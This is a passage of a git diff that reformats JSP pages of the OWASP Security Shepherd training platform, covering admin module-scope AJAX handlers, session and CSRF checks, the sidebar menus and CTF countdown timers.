+			$("#contentDiv").slideDown("slow");
+		});
+	});
+	<% if (isAdmin) { %>
+	$("#allApplication").click(function(){
+        if ($('#unsafeLevels').is(":checked"))
+        {
             var unsafeLevel = $("#unsafeLevels").val();
-        } else {
-            var unsafeLevel = "disable";
         }
-        $("#scopeResultsDiv").slideUp("slow");
-        $("#scopeLoadingDiv").show("slow");
-        $("#setScopeDiv").slideUp("fast", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "openEveryModules",
-                data: {
-                    csrfToken: "<%= csrfToken %>",
+        else{
+            var unsafeLevel = "disable";
+		}
+		$("#scopeResultsDiv").slideUp("slow");
+		$("#scopeLoadingDiv").show("slow");
+		$("#setScopeDiv").slideUp("fast", function(){
+			var ajaxCall = $.ajax({
+				type: "POST",
+				url: "openEveryModules",
+				data: {
+					csrfToken: "<%= csrfToken %>",
                     unsafeLevels: unsafeLevel
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $('#scopeResultsDiv').html(ajaxCall.responseText);
-            } else {
-                $('#scopeResultsDiv').html("<br/><p> Config Failed!: " + ajaxCall.status + " " + ajaxCall.statusText + "</p><br/>");
-            }
-            $("#scopeLoadingDiv").hide("fast", function () {
-                $("#setScopeDiv").slideDown("slow", function () {
-                    $("#scopeResultsDiv").show("fast");
-                    //Refresh the Side Menu
-                    refreshSideMenu(theCsrfToken, theRefreshError);
-                });
-            });
-            $("html, body").animate({scrollTop: 0}, "fast");
-        });
-    });
-
-    $("#onlyWebApplication").click(function () {
-        if ($('#unsafeLevels').is(":checked")) {
+				},
+				async: false
+			});
+			if(ajaxCall.status == 200)
+			{
+				$('#scopeResultsDiv').html(ajaxCall.responseText);
+			}
+			else
+			{
+				$('#scopeResultsDiv').html("<br/><p> Config Failed!: " + ajaxCall.status + " " + ajaxCall.statusText + "</p><br/>");
+			}
+			$("#scopeLoadingDiv").hide("fast", function(){
+				$("#setScopeDiv").slideDown("slow", function(){
+					$("#scopeResultsDiv").show ("fast");
+					//Refresh the Side Menu
+					refreshSideMenu(theCsrfToken, theRefreshError);
+				});
+			});
+			$("html, body").animate({ scrollTop: 0 }, "fast");
+		});
+	});
+	
+	$("#onlyWebApplication").click(function(){
+        if ($('#unsafeLevels').is(":checked"))
+        {
             var unsafeLevel = $("#unsafeLevels").val();
-        } else {
+        }
+        else{
             var unsafeLevel = "disable";
         }
-        $("#scopeResultsDiv").slideUp("slow");
-        $("#scopeLoadingDiv").show("slow");
-        $("#setScopeDiv").slideUp("fast", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "openWebModules",
-                data: {
-                    csrfToken: "<%= csrfToken %>",
+		$("#scopeResultsDiv").slideUp("slow");
+		$("#scopeLoadingDiv").show("slow");
+		$("#setScopeDiv").slideUp("fast", function(){
+			var ajaxCall = $.ajax({
+				type: "POST",
+				url: "openWebModules",
+				data: {
+					csrfToken: "<%= csrfToken %>",
                     unsafeLevels: unsafeLevel
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $('#scopeResultsDiv').html(ajaxCall.responseText);
-            } else {
-                $('#scopeResultsDiv').html("<br/><p> Config Failed!: " + ajaxCall.status + " " + ajaxCall.statusText + "</p><br/>");
-            }
-            $("#scopeLoadingDiv").hide("fast", function () {
-                $("#setScopeDiv").slideDown("slow", function () {
-                    $("#scopeResultsDiv").show("fast");
-                    //Refresh the Side Menu
-                    refreshSideMenu(theCsrfToken, theRefreshError);
-                });
-            });
-            $("html, body").animate({scrollTop: 0}, "fast");
-        });
-    });
-
-    $("#onlyMobileApplication").click(function () {
-        $("#scopeResultsDiv").slideUp("slow");
-        $("#scopeLoadingDiv").show("slow");
-        $("#setScopeDiv").slideUp("fast", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "openMobileModules",
-                data: {
-                    csrfToken: "<%= csrfToken %>"
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $('#scopeResultsDiv').html(ajaxCall.responseText);
-            } else {
-                $('#scopeResultsDiv').html("<br/><p> Config Failed!: " + ajaxCall.status + " " + ajaxCall.statusText + "</p><br/>");
-            }
-            $("#scopeLoadingDiv").hide("fast", function () {
-                $("#setScopeDiv").slideDown("slow", function () {
-                    $("#scopeResultsDiv").show("fast");
-                    //Refresh the Side Menu
-                    refreshSideMenu(theCsrfToken, theRefreshError);
-                });
-            });
-            $("html, body").animate({scrollTop: 0}, "fast");
-        });
-    });
-
-    $("#noApplication").click(function () {
-        $("#scopeResultsDiv").slideUp("slow");
-        $("#scopeLoadingDiv").show("slow");
-        $("#setScopeDiv").slideUp("fast", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "closeEveryModules",
-                data: {
-                    csrfToken: "<%= csrfToken %>"
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $('#scopeResultsDiv').html(ajaxCall.responseText);
-            } else {
-                $('#scopeResultsDiv').html("<br/><p> Config Failed!: " + ajaxCall.status + " " + ajaxCall.statusText + "</p><br/>");
-            }
-            $("#scopeLoadingDiv").hide("fast", function () {
-                $("#setScopeDiv").slideDown("slow", function () {
-                    $("#scopeResultsDiv").show("fast");
-                    //Refresh the Side Menu
-                    refreshSideMenu(theCsrfToken, theRefreshError);
-                });
-            });
-            $("html, body").animate({scrollTop: 0}, "fast");
-        });
-    });
-    <% } // End of Admin Only Script%>
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+				},
+				async: false
+			});
+			if(ajaxCall.status == 200)
+			{
+				$('#scopeResultsDiv').html(ajaxCall.responseText);
+			}
+			else
+			{
+				$('#scopeResultsDiv').html("<br/><p> Config Failed!: " + ajaxCall.status + " " + ajaxCall.statusText + "</p><br/>");
+			}
+			$("#scopeLoadingDiv").hide("fast", function(){
+				$("#setScopeDiv").slideDown("slow", function(){
+					$("#scopeResultsDiv").show ("fast");
+					//Refresh the Side Menu
+					refreshSideMenu(theCsrfToken, theRefreshError);
+				});
+			});
+			$("html, body").animate({ scrollTop: 0 }, "fast");
+		});
+	});
+	
+	$("#onlyMobileApplication").click(function(){
+		$("#scopeResultsDiv").slideUp("slow");
+		$("#scopeLoadingDiv").show("slow");
+		$("#setScopeDiv").slideUp("fast", function(){
+			var ajaxCall = $.ajax({
+				type: "POST",
+				url: "openMobileModules",
+				data: {
+					csrfToken: "<%= csrfToken %>"
+				},
+				async: false
+			});
+			if(ajaxCall.status == 200)
+			{
+				$('#scopeResultsDiv').html(ajaxCall.responseText);
+			}
+			else
+			{
+				$('#scopeResultsDiv').html("<br/><p> Config Failed!: " + ajaxCall.status + " " + ajaxCall.statusText + "</p><br/>");
+			}
+			$("#scopeLoadingDiv").hide("fast", function(){
+				$("#setScopeDiv").slideDown("slow", function(){
+					$("#scopeResultsDiv").show ("fast");
+					//Refresh the Side Menu
+					refreshSideMenu(theCsrfToken, theRefreshError);
+				});
+			});
+			$("html, body").animate({ scrollTop: 0 }, "fast");
+		});
+	});
+	
+	$("#noApplication").click(function(){
+		$("#scopeResultsDiv").slideUp("slow");
+		$("#scopeLoadingDiv").show("slow");
+		$("#setScopeDiv").slideUp("fast", function(){
+			var ajaxCall = $.ajax({
+				type: "POST",
+				url: "closeEveryModules",
+				data: {
+					csrfToken: "<%= csrfToken %>"
+				},
+				async: false
+			});
+			if(ajaxCall.status == 200)
+			{
+				$('#scopeResultsDiv').html(ajaxCall.responseText);
+			}
+			else
+			{
+				$('#scopeResultsDiv').html("<br/><p> Config Failed!: " + ajaxCall.status + " " + ajaxCall.statusText + "</p><br/>");
+			}
+			$("#scopeLoadingDiv").hide("fast", function(){
+				$("#setScopeDiv").slideDown("slow", function(){
+					$("#scopeResultsDiv").show ("fast");
+					//Refresh the Side Menu
+					refreshSideMenu(theCsrfToken, theRefreshError);
+				});
+			});
+			$("html, body").animate({ scrollTop: 0 }, "fast");
+		});
+	});
+	<% } // End of Admin Only Script%>
+	</script>
+<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
 <% } %>
 <%
-            }
-        } else {
-            response.sendRedirect("login.jsp");
-        }
-    } else {
-        response.sendRedirect("login.jsp");
-    }
+}
+}
+else
+{
+response.sendRedirect("login.jsp");
+}
+}
+else
+{
+response.sendRedirect("login.jsp");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/index.jsp b/src/main/webapp/index.jsp
index 0a895ef2c..f751bc971 100644
--- a/src/main/webapp/index.jsp
+++ b/src/main/webapp/index.jsp
@@ -1,64 +1,69 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*" %>
-<%@ page import="java.util.Locale" %>
-<%@ include file="translation.jsp" %>
+	language="java"
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"%>
+<%@ page import="java.util.Locale"%>
+<%@ include file="translation.jsp"%>
 <%
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: index.jsp *************************");
-    Locale lang = new Locale(Validate.validateLanguage(request.getSession()));
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: index.jsp *************************");
+	Locale lang = new Locale(Validate.validateLanguage(request.getSession()));
 /**
  * This file is part of the Security Shepherd Project.
- *
+ * 
  * The Security Shepherd project is free software: you can redistribute it and/or modify
  * it under the terms of the GNU General Public License as published by
  * the Free Software Foundation, either version 3 of the License, or
  * (at your option) any later version.<br/>
- *
+ * 
  * The Security Shepherd project is distributed in the hope that it will be useful,
  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  * GNU General Public License for more details.<br/>
- *
+ * 
  * You should have received a copy of the GNU General Public License
  * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
- *
+ * 
  * @author Mark Denihan
  */
 
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        Getter get = new Getter();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(index.jsp): tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // Also, if tokenCookie != null, then the page is good to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            //Log User Name
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
-            // Getting Session Variables
-            //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
-
-            String csrfToken = Encode.forHtml(tokenCookie.getValue());
-            String userName = Encode.forHtml(ses.getAttribute("userName").toString());
-            String userRole = Encode.forHtml(ses.getAttribute("userRole").toString());
-            String userId = Encode.forJavaScriptBlock(ses.getAttribute("userStamp").toString());
-            boolean canSeeScoreboard = ScoreboardStatus.canSeeScoreboard((String) ses.getAttribute("userRole"));
-            String csrfJsToken = Encode.forJavaScriptBlock(tokenCookie.getValue());
-            String ApplicationRoot = getServletContext().getRealPath("");
-            boolean showCheatSheet = CheatSheetStatus.showCheat(userRole);
-            int i = 0;
+if (request.getSession() != null)
+{
+	HttpSession ses = request.getSession();
+	Getter get = new Getter();
+	//Getting CSRF Token from client
+	Cookie tokenCookie = null;
+	try
+	{
+		tokenCookie = Validate.getToken(request.getCookies());
+	}
+	catch(Exception htmlE)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(index.jsp): tokenCookie Error:" + htmlE.toString());
+	}
+	// validateSession ensures a valid session, and valid role credentials
+	// Also, if tokenCookie != null, then the page is good to continue loading
+	if (Validate.validateSession(ses) && tokenCookie != null)
+	{
+		//Log User Name
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+		// Getting Session Variables
+		//The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
+		
+		String csrfToken = Encode.forHtml(tokenCookie.getValue());
+		String userName = Encode.forHtml(ses.getAttribute("userName").toString());
+		String userRole = Encode.forHtml(ses.getAttribute("userRole").toString());
+		String userId = Encode.forJavaScriptBlock(ses.getAttribute("userStamp").toString());
+		boolean canSeeScoreboard = ScoreboardStatus.canSeeScoreboard((String)ses.getAttribute("userRole"));
+		String csrfJsToken = Encode.forJavaScriptBlock(tokenCookie.getValue());
+		String ApplicationRoot = getServletContext().getRealPath("");
+		boolean showCheatSheet = CheatSheetStatus.showCheat(userRole);
+		int i = 0;
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>OWASP Security Shepherd</title>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>OWASP Security Shepherd</title>
 
-    <!--
+<!-- 
 			<fmt:message key="generic.text.commentMessage.1" /> 
 			<fmt:message key="generic.text.commentMessage.2" /> 
 			<fmt:message key="generic.text.commentMessage.3" /> 
@@ -67,1168 +72,1154 @@
 			<fmt:message key="generic.text.shepherdVersion" />
 		-->
 
-    <link href="css/theCss.css" rel="stylesheet" type="text/css"
-          media="screen"/>
-    <link href="css/theResponsiveCss.css" rel="stylesheet" type="text/css"
-          media="screen">
-    <link href="css/jquery.mCustomScrollbar.min.css" rel="stylesheet"
-          type="text/css" media="screen">
-    <link rel="shortcut icon" href="css/images/flavicon.jpg"
-          type="image/jpeg"/>
+<link href="css/theCss.css" rel="stylesheet" type="text/css"
+	media="screen" />
+<link href="css/theResponsiveCss.css" rel="stylesheet" type="text/css"
+	media="screen">
+<link href="css/jquery.mCustomScrollbar.min.css" rel="stylesheet"
+	type="text/css" media="screen">
+<link rel="shortcut icon" href="css/images/flavicon.jpg"
+	type="image/jpeg" />
 
 </head>
 <body>
-<script type="text/javascript" src="js/jquery.js"></script>
-<script type="text/javascript" src="js/jqueryUI.js"></script>
-<script type="text/javascript"
-        src="js/jquery.mCustomScrollbar.concat.min.js"></script>
-<div id="wrapper">
-    <jsp:include page="translation-select.jsp"/>
-    <div id="header">
-        <h1>Security Shepherd</h1>
-        <div style="position: absolute; top: 12px; right: 130px;">
-            <p>
-                <strong><%= userName %>&nbsp;&#x7c;&nbsp;<a
-                        href="logout?csrfToken=<%= csrfToken %>"><fmt:message
-                        key="generic.text.logout"/></a></strong>
-            </p>
-        </div>
-    </div>
-
-    <div id="page">
-        <div id="submitResult">
-            <form action="javascript:;" id="resultForm">
-                <input type="hidden" id="currentModule" value="">
-                <table class="resultTable">
-                    <tr>
-                        <td class="resultBoxCell"><input type="text"
-                                                         id="moduleResult" class="resultbox"
-                                                         placeholder="<fmt:message key="generic.text.submitResult" />..."
-                                                         autocomplete="OFF"/></td>
-                        <td class="submitResultCell">
-                            <div id="submitForm">
-                                <input type="submit"
-                                       value="<fmt:message key="generic.text.submit" />"/>
-                            </div>
-                            <div id="submitLoading" style="display: none;">
-                                <fmt:message key="generic.text.loading"/>
-                            </div>
-                        </td>
-                    </tr>
-                </table>
-                <div id="resultResponse"></div>
-            </form>
-            <% if (showCheatSheet) { %>
-            <div id="solutionDiv" style="display: none;"></div>
-            <% } %>
-        </div>
-        <!-- <fmt:message key="generic.text.commentMessage.1" />
+	<script type="text/javascript" src="js/jquery.js"></script>
+	<script type="text/javascript" src="js/jqueryUI.js"></script>
+	<script type="text/javascript"
+		src="js/jquery.mCustomScrollbar.concat.min.js"></script>
+	<div id="wrapper">
+		<jsp:include page="translation-select.jsp" />
+		<div id="header">
+			<h1>Security Shepherd</h1>
+			<div style="position: absolute; top: 12px; right: 130px;">
+				<p>
+					<strong><%= userName %>&nbsp;&#x7c;&nbsp;<a
+						href="logout?csrfToken=<%= csrfToken %>"><fmt:message
+								key="generic.text.logout" /></a></strong>
+				</p>
+			</div>
+		</div>
+
+		<div id="page">
+			<div id="submitResult">
+				<form action="javascript:;" id="resultForm">
+					<input type="hidden" id="currentModule" value="">
+					<table class="resultTable">
+						<tr>
+							<td class="resultBoxCell"><input type="text"
+								id="moduleResult" class="resultbox"
+								placeholder="<fmt:message key="generic.text.submitResult" />..."
+								autocomplete="OFF" /></td>
+							<td class="submitResultCell"><div id="submitForm">
+									<input type="submit"
+										value="<fmt:message key="generic.text.submit" />" />
+								</div>
+								<div id="submitLoading" style="display: none;">
+									<fmt:message key="generic.text.loading" />
+								</div></td>
+						</tr>
+					</table>
+					<div id="resultResponse"></div>
+				</form>
+				<% if(showCheatSheet) { %>
+				<div id="solutionDiv" style="display: none;"></div>
+				<% } %>
+			</div>
+			<!-- <fmt:message key="generic.text.commentMessage.1" /> 
 			<fmt:message key="generic.text.commentMessage.2" /> 
 			<fmt:message key="generic.text.commentMessage.3" /> 
 			<fmt:message key="generic.text.commentMessage.4" /> -->
-        <div id="contentDiv">
-            <!-- Ajax Div -->
-        </div>
-        <div id="theSidebarWrapper" class="sidebarWrapper"
-             onmouseover="resizeSidebar()">
-            <div class="menuIcon">&#9776;</div>
-            <div id="sidebar">
-                <ul>
-                    <% if (userRole.compareTo("admin") == 0) { %>
-                    <li><a id="adminList" href="javascript:;">
-                        <div
-                                class='menuButton'>
-                            <fmt:message key="generic.text.admin"/>
-                        </div>
-                    </a>
-                        <ul id="theAdminList" style="display: none;">
-                            <li><a id="configurationList" href="javascript:;"><fmt:message
-                                    key="generic.text.configuration"/></a>
-                                <ul id="theConfigurationList" style="display: none;">
-                                    <li><a id="aboutShepherdLink" href="javascript:;"><fmt:message
-                                            key="generic.text.aboutSecShep"/></a></li>
-                                    <li><a id="cheatSheetLink" href="javascript:;"><fmt:message
-                                            key="index.link.admin.cheatSheet.manage"/></a></li>
-                                    <li><a id="configureFeedbackLink" href="javascript:;"><fmt:message
-                                            key="index.link.admin.config.feedback"/></a></li>
-                                    <li><a id="registrationLink" href="javascript:;"><fmt:message
-                                            key="index.link.admin.config.openClose"/></a></li>
-                                    <li><a id="scoreboardLink" href="javascript:;"><fmt:message
-                                            key="index.link.admin.config.scoreboard"/></a></li>
-                                    <li><a id="setCoreDatabaseLink" href="javascript:;"><fmt:message
-                                            key="index.link.admin.config.coreDb"/></a></li>
-                                </ul>
-                            </li>
-                            <li><a id="moduleManagementList" href="javascript:;"><fmt:message
-                                    key="index.link.admin.moduleManage"/></a>
-                                <ul id="theModuleManagementList" style="display: none;">
-                                    <li><a id="levelLayoutLink" href="javascript:;"><fmt:message
-                                            key="index.link.admin.config.change"/></a></li>
-                                    <li><a id="moduleBlockLink" href="javascript:;"><fmt:message
-                                            key="index.link.admin.moduleManage.block"/></a></li>
-                                    <li><a id="setModuleStatusLink" href="javascript:;"><fmt:message
-                                            key="index.link.admin.moduleManage.openClose"/></a></li>
-                                    <li><a id="openCloseByCategory" href="javascript:;"><fmt:message
-                                            key="index.link.admin.moduleManage.openCloseCategory"/></a></li>
-                                    <li><a id="feedbackLink" href="javascript:;"><fmt:message
-                                            key="index.link.admin.moduleManage.feedback"/></a></li>
-                                    <li><a id="progressLink" href="javascript:;"><fmt:message
-                                            key="index.link.admin.moduleManage.progress"/></a></li>
-                                </ul>
-                            </li>
-                            <li><a id="userManagementList" href="javascript:;"><fmt:message
-                                    key="index.link.admin.userMange"/></a>
-                                <ul id="theUserManagementList" style="display: none;">
-                                    <li><a id="addPlayersLink" href="javascript:;"><fmt:message
-                                            key="index.link.admin.userMange.addPlayer"/></a></li>
-                                    <li><a id="deletePlayersLink" href="javascript:;"><fmt:message
-                                            key="index.link.admin.userMange.deletePlayer"/></a></li>
-                                    <li><a id="updatePlayerScoreLink" href="javascript:;"><fmt:message
-                                            key="index.link.admin.userMange.addPoints"/></a></li>
-                                    <li><a id="assignPlayersLink" href="javascript:;"><fmt:message
-                                            key="index.link.admin.userMange.assignPlayer"/></a></li>
-                                    <li><a id="createNewClassLink" href="javascript:;"><fmt:message
-                                            key="index.link.admin.userMange.createClass"/></a></li>
-                                    <li><a id="createNewAdminLink" href="javascript:;"><fmt:message
-                                            key="index.link.admin.userMange.createAdmin"/></a></li>
-                                    <li><a id="changePlayerPasswordLink" href="javascript:;"><fmt:message
-                                            key="index.link.admin.userMange.resetPass"/></a></li>
-                                    <li><a id="setDefaultClassForRegistrationLink"
-                                           href="javascript:;"><fmt:message
-                                            key="index.link.admin.userMange.setDefaultPlayerClass"/></a></li>
-                                    <li><a id="suspendPlayerLink" href="javascript:;"><fmt:message
-                                            key="index.link.admin.userMange.suspendPlayer"/></a></li>
-                                    <li><a id="unSuspendPlayerLink" href="javascript:;"><fmt:message
-                                            key="index.link.admin.userMange.unsuspendPlayer"/></a></li>
-                                    <li><a id="upgradePlayersLink" href="javascript:;"><fmt:message
-                                            key="index.link.admin.userMange.upgradeToAdmin"/></a></li>
-                                    <li><a id="downgradeAdminLink" href="javascript:;"><fmt:message
-                                            key="index.link.admin.userMange.downgradeToPlayer"/></a></li>
-                                </ul>
-                            </li>
-                        </ul>
-                    </li>
-                    <% } %>
-                    <% if (canSeeScoreboard) { %>
-                    <div id="scoreboardButton">
-                        <a id="showScoreboard" href="scoreboard.jsp" target="bar">
-                            <div
-                                    class="menuButton">
-                                <fmt:message key="generic.text.scoreboard"/>
-                            </div>
-                        </a>
-                    </div>
-                    <% } %>
-                    <% if (showCheatSheet) { %>
-                    <div id="cheatSheetButton" style="display: none;">
-                        <a id="showSolution" href="javascript:;">
-                            <div
-                                    class="menuButton">
-                                <fmt:message key="generic.text.cheat"/>
-                            </div>
-                        </a>
-                    </div>
-                    <% }
-                        if (CountdownHandler.isRunning() || (userRole.compareTo("admin") == 0)) { %>
-                    <div id="levelListDiv">
-                        <div id="sideMenuWrapper">
-                            <% if (ModulePlan.isOpenFloor()) { %>
-                            <li><a id="lessonList" href="javascript:;">
-                                <div
-                                        class="menuButton">
-                                    <fmt:message key="generic.text.lessons"/>
-                                </div>
-                            </a>
-                                <ul id="theLessonList" style="display: none;">
-                                    <%= Getter.getLessons(ApplicationRoot, (String) ses.getAttribute("userStamp"), lang) %>
-                                </ul>
-                            </li>
-                            <li><a id="challengeList" href="javascript:;">
-                                <div
-                                        class="menuButton">
-                                    <fmt:message key="generic.text.challenges"/>
-                                </div>
-                            </a>
-                                <ul id="theChallengeList" style="display: none;">
-                                    <%= Getter.getChallenges(ApplicationRoot, (String) ses.getAttribute("userStamp"), lang) %>
-                                </ul>
-                            </li>
-                            <% } else {
-                                if (ModulePlan.isIncrementalFloor()) { %>
-                            <%= Getter.getIncrementalModulesWithoutScript(ApplicationRoot, (String) ses.getAttribute("userStamp"), ses.getAttribute("lang").toString(), csrfToken) %>
-                            <% } else {%>
-                            <li><%= Getter.getTournamentModules(ApplicationRoot, (String) ses.getAttribute("userStamp"), lang) %>
-                            </li>
-                            <% }
-                            } //End of Module List Output %>
-                        </div>
-                    </div>
-                    <% } %>
-                    <div id="menuRefreshLoadingDiv"></div>
-                    <div>
-                        <input id="searchModules" class="moduleSearchBox" type="search"
-                               placeholder="<fmt:message key="generic.text.searchModules" />...">
-                    </div>
-                    <div id="searchResults">
-                        <!-- Results from module search go here -->
-                    </div>
-                    <script>
-                        function makeSearchList() {
-                            //Make list for module search box
-                            console.log("Making Search List...");
-                            var availableModules = [];
-                            $(".lesson").each(function (index) {
-                                availableModules.push($(this).text());
-                            }); //Make array out of available modules listed
-                            console.log(availableModules.length + " modules added to search list");
-                            $("#searchModules").autocomplete({
-                                source: availableModules,
-                                appendTo: "#searchResults"
-                            });
-                        }
-
-                        //Make Search List
-                        makeSearchList();
-
-                        $("#searchModules").on("autocompleteselect", function (event, ui) {
-                            var toOpen = ui.item.value
-                            console.log("Opening: " + toOpen);
-                            $(".lesson").each(function (index) {
-                                console.log($(this));
-                                if ($(this).html().indexOf(toOpen) > -1) { //If the Level description exists in the lesson entry, then we have the right one
-                                    console.log("Clicking lesson entry...");
-                                    $(this).click();
-                                    return false;
-                                }
-                            });
-                            console.log("Select Function Finish");
-                        });
-
-                        $("#searchModules").on("autocompleteopen", function (event, ui) {
-                            console.log("Module Search Box Opened");
-                            $('#theSidebarWrapper').removeClass('sidebarWrapper').addClass("sidebarWrapperAlwaysOpen");
-                        });
-
-                        $("#searchModules").on("autocompleteclose", function (event, ui) {
-                            console.log("Module Search Box Closed");
-                            $('#theSidebarWrapper').removeClass('sidebarWrapperAlwaysOpen').addClass("sidebarWrapper");
-                        });
-                    </script>
-                    <div id="startTimer">
-                        <!-- Countdown to start time -->
-                        <div id="startMessage"></div>
-                        <div id="startDays"></div>
-                        <div id="startHours"></div>
-                        <div id="startMinutes"></div>
-                        <div id="startSeconds"></div>
-                    </div>
-                    <div id="lockTimer">
-                        <!-- Countdown to lock time -->
-                        <div id="lockMessage"></div>
-                        <div id="lockDays"></div>
-                        <div id="lockHours"></div>
-                        <div id="lockMinutes"></div>
-                        <div id="lockSeconds"></div>
-                    </div>
-                    <div id="endTimer">
-                        <!-- Countdown to end time -->
-                        <div id="endMessage"></div>
-                        <div id="endDays"></div>
-                        <div id="endHours"></div>
-                        <div id="endMinutes"></div>
-                        <div id="endSeconds"></div>
-                    </div>
-                    <script>
-                        function makeTimer(prefix, endTime, message) {
-
-                            var endDateTime = new Date(endTime);
-                            endDateTime = (Date.parse(endTime) / 1000);
-
-                            var now = new Date();
-                            now = (Date.parse(now) / 1000);
-
-                            var timeLeft = endDateTime - now;
-
-                            if (timeLeft < 0) {
-
-                                $("#" + prefix + "Message").html();
-                                $("#" + prefix + "Days").html();
-                                $("#" + prefix + "Hours").html();
-                                $("#" + prefix + "Minutes").html();
-                                $("#" + prefix + "Seconds").html();
-
-                                return;
-                            }
-
-                            $("#" + prefix + "Message").html(message);
-
-                            var days = Math.floor(timeLeft / 86400);
-                            var hours = Math.floor((timeLeft - (days * 86400)) / 3600);
-                            var minutes = Math.floor((timeLeft - (days * 86400) - (hours * 3600)) / 60);
-                            var seconds = Math.floor((timeLeft - (days * 86400) - (hours * 3600) - (minutes * 60)));
-
-                            if (days > "0") {
-                                $("#" + prefix + "Days").html(days + "<span>Days</span>");
-                            } else {
-                                $("#" + prefix + "Days").html();
-                            }
-
-                            if (hours > "0") {
-                                if (hours < "10") {
-                                    hours = "0" + hours;
-                                }
-                                $("#" + prefix + "Hours").html(hours + "<span>Hours</span>");
-                            } else {
-                                $("#" + prefix + "Hours").html();
-                            }
-
-                            if (minutes > "0") {
-                                if (minutes < "10") {
-                                    minutes = "0" + minutes;
-                                }
-                                $("#" + prefix + "Minutes").html(minutes + "<span>Minutes</span>");
-                            } else {
-                                $("#" + prefix + "Minutes").html();
-                            }
-
-                            if (seconds > "0") {
-                                if (seconds < "10") {
-                                    seconds = "0" + seconds;
-                                }
-                                $("#" + prefix + "Seconds").html(seconds + "<span>Seconds</span>");
-                            } else {
-                                $("#" + prefix + "Seconds").html();
-
-                            }
-                        }
-
-                        <% if (CountdownHandler.willStart()) { %>
-                        setInterval(function () {
-                            makeTimer("start", "<% out.print(CountdownHandler.getStartTime()); %>", "CTF will start in ");
-                        }, 1000);
-                        <%
-                        }
-
-                        if (CountdownHandler.willLock()) { %>
-                        setInterval(function () {
-                            makeTimer("lock", "<% out.print(CountdownHandler.getLockTime()); %>", "Points available for ");
-                        }, 1000);
-                        <%
-                        }
-
-                        if (CountdownHandler.willLock() || CountdownHandler.willEnd()) { %>
-                        setInterval(function () {
-                            makeTimer("end", "<% out.print(CountdownHandler.getEndTime()); %>", "CTF ends in ");
-                        }, 1000);
-                        <%
-                        } %>
-
-                    </script>
-                </ul>
-                <!-- <fmt:message key="generic.text.commentMessage.1" />
+			<div id="contentDiv">
+				<!-- Ajax Div -->
+			</div>
+			<div id="theSidebarWrapper" class="sidebarWrapper"
+				onmouseover="resizeSidebar()">
+				<div class="menuIcon">&#9776;</div>
+				<div id="sidebar">
+					<ul>
+						<% if (userRole.compareTo("admin") == 0){ %>
+						<li><a id="adminList" href="javascript:;"><div
+									class='menuButton'>
+									<fmt:message key="generic.text.admin" />
+								</div></a>
+							<ul id="theAdminList" style="display: none;">
+								<li><a id="configurationList" href="javascript:;"><fmt:message
+											key="generic.text.configuration" /></a>
+									<ul id="theConfigurationList" style="display: none;">
+										<li><a id="aboutShepherdLink" href="javascript:;"><fmt:message
+													key="generic.text.aboutSecShep" /></a></li>
+										<li><a id="cheatSheetLink" href="javascript:;"><fmt:message
+													key="index.link.admin.cheatSheet.manage" /></a></li>
+										<li><a id="configureFeedbackLink" href="javascript:;"><fmt:message
+													key="index.link.admin.config.feedback" /></a></li>
+										<li><a id="registrationLink" href="javascript:;"><fmt:message
+													key="index.link.admin.config.openClose" /></a></li>
+										<li><a id="scoreboardLink" href="javascript:;"><fmt:message
+													key="index.link.admin.config.scoreboard" /></a></li>
+										<li><a id="setCoreDatabaseLink" href="javascript:;"><fmt:message
+													key="index.link.admin.config.coreDb" /></a></li>
+									</ul></li>
+								<li><a id="moduleManagementList" href="javascript:;"><fmt:message
+											key="index.link.admin.moduleManage" /></a>
+									<ul id="theModuleManagementList" style="display: none;">
+										<li><a id="levelLayoutLink" href="javascript:;"><fmt:message
+													key="index.link.admin.config.change" /></a></li>
+										<li><a id="moduleBlockLink" href="javascript:;"><fmt:message
+													key="index.link.admin.moduleManage.block" /></a></li>
+										<li><a id="setModuleStatusLink" href="javascript:;"><fmt:message
+													key="index.link.admin.moduleManage.openClose" /></a></li>
